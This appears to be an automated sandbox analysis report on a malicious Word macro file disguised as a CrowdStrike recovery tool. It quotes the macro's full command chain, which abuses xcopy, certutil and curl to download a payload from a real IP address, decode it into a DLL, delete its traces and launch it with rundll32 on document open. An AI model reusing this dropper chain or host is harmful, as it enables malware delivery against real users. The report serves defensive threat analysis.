00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510132228.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479710584.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:5000/Uploadss
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/pay
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/pay0
Source: curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt-oC:
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt6
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt6ov
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txto
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txton
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txtr
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txts
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:80X99
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: document.xml	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/P
Source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: V2ViIERhdGE=.16.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49268
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801

Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,

16_2_00007FFD92C64B30

System Summary

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)			Name: MainFunc
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Document contains an embedded VBA macro with suspicious strings

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")	Name: MainFunc
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Jump to dropped file

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\rundll32.exe

File deleted: C:\Windows\Temp\SGlzdG9yeQ==

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_00871535	13_2_00871535
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0089A8D8	13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0087A9B3	13_2_0087A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0088C1FD	13_2_0088C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0086E127	13_2_0086E127
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008ACAA0	13_2_008ACAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_0087FAEC	13_2_0087FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B33B0	13_2_008B33B0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_00874415	13_2_00874415
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008825B8	13_2_008825B8
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C19250	16_2_00007FFD92C19250
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C95204	16_2_00007FFD92C95204
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C291B0	16_2_00007FFD92C291B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF5730	16_2_00007FFD92BF5730
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C9B7E0	16_2_00007FFD92C9B7E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C95A60	16_2_00007FFD92C95A60
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C2F940	16_2_00007FFD92C2F940
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF18C0	16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92CAFA20	16_2_00007FFD92CAFA20
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C99CA0	16_2_00007FFD92C99CA0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEFE10	16_2_00007FFD92BEFE10
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF6120	16_2_00007FFD92BF6120
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C1A0A0	16_2_00007FFD92C1A0A0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2210	16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEEAA0	16_2_00007FFD92BEEAA0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF2E60	16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEED05	16_2_00007FFD92BEED05
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF0DA0	16_2_00007FFD92BF0DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C231D0	16_2_00007FFD92C231D0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C25170	16_2_00007FFD92C25170
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF5160	16_2_00007FFD92BF5160
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C1B190	16_2_00007FFD92C1B190
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C496B0	16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C515E0	16_2_00007FFD92C515E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C09960	16_2_00007FFD92C09960
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C2BCB0	16_2_00007FFD92C2BCB0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C23DE0	16_2_00007FFD92C23DE0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE330	16_2_00007FFD92BFE330
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BEE140	16_2_00007FFD92BEE140
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C5E0B0	16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C32080	16_2_00007FFD92C32080
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C96250	16_2_00007FFD92C96250
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3C160	16_2_00007FFD92C3C160
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE710	16_2_00007FFD92BFE710
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C3A7E0	16_2_00007FFD92C3A7E0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C947A0	16_2_00007FFD92C947A0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C747C0	16_2_00007FFD92C747C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE520	16_2_00007FFD92BFE520
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C04540	16_2_00007FFD92C04540
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C36460	16_2_00007FFD92C36460
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64B30	16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF4BC0	16_2_00007FFD92BF4BC0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C96B6E	16_2_00007FFD92C96B6E
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BFE900	16_2_00007FFD92BFE900
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C00860	16_2_00007FFD92C00860
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C16A00	16_2_00007FFD92C16A00
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C64CF0	16_2_00007FFD92C64CF0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C66E50	16_2_00007FFD92C66E50
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C96E10	16_2_00007FFD92C96E10
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C94D80	16_2_00007FFD92C94D80
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00841535	33_2_00841535
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0086A8D8	33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0084A9B3	33_2_0084A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0085C1FD	33_2_0085C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0083E127	33_2_0083E127
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0087CAA0	33_2_0087CAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0084FAEC	33_2_0084FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_008833B0	33_2_008833B0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00844415	33_2_00844415
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_008525B8	33_2_008525B8

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open	Name: Document_Open
Source: ~WRC0000.tmp.26.dr	OLE, VBA macro line: Sub Document_Open()

Document contains embedded VBA macros

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: turabian.xsl.0.dr	OLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.dr	OLE indicator, VBA macros: true
Source: gostname.xsl.0.dr	OLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.dr	OLE indicator, VBA macros: true
Source: sist02.xsl.0.dr	OLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.dr	OLE indicator, VBA macros: true
Source: gb.xsl.0.dr	OLE indicator, VBA macros: true
Source: iso690.xsl.0.dr	OLE indicator, VBA macros: true
Source: chicago.xsl.0.dr	OLE indicator, VBA macros: true
Source: gosttitle.xsl.0.dr	OLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.26.dr	OLE indicator, VBA macros: true
Source: ~WRC0000.tmp.26.dr	OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: harvardanglia2008officeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: CatalogCacheMetaData.xml.26.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C915E0 appears 132 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C26F90 appears 415 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C15F20 appears 56 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C2B840 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C20ED0 appears 71 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C15810 appears 68 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C97390 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92BEAA50 appears 36 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C27080 appears 332 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C90F70 appears 42 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C15FF0 appears 35 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C91110 appears 87 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C91570 appears 266 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C157A0 appears 36 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92CABF00 appears 47 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C127F0 appears 47 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFD92C90FF0 appears 434 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084D632 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0083913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 00842564 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 008720E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0084251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0086913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 008420E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 0087D632 appears 247 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 00872564 appears 48 times

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0086310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

13_2_0086310D

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
